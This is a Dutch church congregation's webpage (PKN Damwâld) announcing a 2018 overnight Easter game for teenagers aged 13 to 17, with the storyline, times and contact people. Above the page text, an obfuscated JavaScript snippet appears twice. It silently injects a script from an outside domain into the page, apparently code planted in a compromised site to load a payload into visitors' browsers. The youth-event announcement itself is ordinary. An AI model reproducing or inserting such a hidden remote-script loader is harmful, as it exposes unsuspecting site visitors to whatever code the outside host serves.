;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Doe mee aan de spannende PaasChallenge! - PKN Damwâld

Doe mee aan de spannende PaasChallenge!

Gepubliceerd op: maandag 26 februari 2018

2000 jaar geleden heeft het verhaal van Jezus onze geschiedenis volledig op z’n kop gezet. Maar wat gebeurde er die laatste dagen van zijn leven? In de PaasChallenge gaan jij in een spannend spel in de nacht meemaken wat zich toen afspeelde.

Je kruipt in de huid van een volgeling van Jezus: Johannes, die graag in veiligheid wil zijn, Petrus, die wil vechten voor zijn idealen en Judas, die Jezus wil verraden. Na een maaltijd ontstaat er een “manhunt” met challenges die je in een soort “Wie is de Mol” spel moet winnen. Je ontvangt een brief van Jezus en je gaat op weg naar zijn schuilplaats. Onderweg heb je ontmoetingen met de machthebbers uit Jezus’ tijd. En alles eindigt met een bijzondere ontknoping.

Hoe doe ik mee?

Ben jij tussen de 13 en 17 jaar oud? doe dan mee! We starten op zaterdag 31 maart om 22:00 aan een spannend nachtelijk avontuur! Door middel van leuke en spannende opdrachten ga jij met je groepje het paasverhaal ontdekken. Uiteraard zorgen wij de hele avond voor jou, van begeleiding tot eten en drinken! Op paaszondag zal het avontuur rond 8 uur afgelopen zijn, ruim op tijd voor de kerkdienst 🙂

Dus, vraag je vrienden en doe mee aan dit spannende avontuur! Ben je nog niet helemaal overtuigd? Bekijk dan onderstaande trailer, het wordt echt waar fantastisch!

Heb je nog vragen?

Je mag al je vragen stellen aan Ester Kooistra (Jeugdouderling gereformeerd) of Petra Den Hartogh (Jeugdouderling hervormd). Contactinformatie kun je vinden in de Paadwizer.

Ja ik geef mij op!

 

Helaas, we hebben met maximaal aantal deelnemers van de PaasChallenge bereikt…